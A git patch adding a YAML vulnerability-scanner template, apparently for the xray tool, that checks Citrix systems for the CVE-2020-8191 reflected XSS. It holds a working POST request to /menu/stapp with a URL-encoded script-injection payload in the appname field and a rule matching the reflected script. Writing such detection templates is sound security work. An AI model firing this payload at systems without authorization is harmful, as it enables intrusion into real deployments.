From a87398948091de7821d4730271c2322e886b4992 Mon Sep 17 00:00:00 2001
From: Jing Ling <shmilylty@gmail.com>
Date: Thu, 16 Jul 2020 14:57:27 +0800
Subject: [PATCH] Create citrix-cve-2020-8191-xss.yml (#797)

---
 pocs/citrix-cve-2020-8191-xss.yml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 pocs/citrix-cve-2020-8191-xss.yml

diff --git a/pocs/citrix-cve-2020-8191-xss.yml b/pocs/citrix-cve-2020-8191-xss.yml
new file mode 100644
index 000000000..0a91e3cdb
--- /dev/null
+++ b/pocs/citrix-cve-2020-8191-xss.yml
@@ -0,0 +1,18 @@
+name: poc-yaml-citrix-cve-2020-8191-xss
+set:
+  r1: randomLowercase(6)
+rules:
+  - method: POST
+    path: /menu/stapp
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
+    follow_redirects: true
+    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>"))
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://support.citrix.com/article/CTX276688
+    - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
+    - https://dmaasland.github.io/posts/citrix.html